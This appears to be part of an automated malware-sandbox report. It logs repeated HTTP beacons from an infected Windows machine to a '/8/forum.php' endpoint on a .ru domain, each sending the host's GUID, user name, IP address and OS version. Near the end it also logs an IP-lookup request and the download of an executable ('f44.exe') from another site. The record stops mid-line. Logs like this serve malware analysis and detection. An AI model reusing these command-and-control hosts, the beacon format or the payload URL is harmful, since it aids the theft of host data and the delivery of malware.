Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f44.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sturtevantforcongress.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ 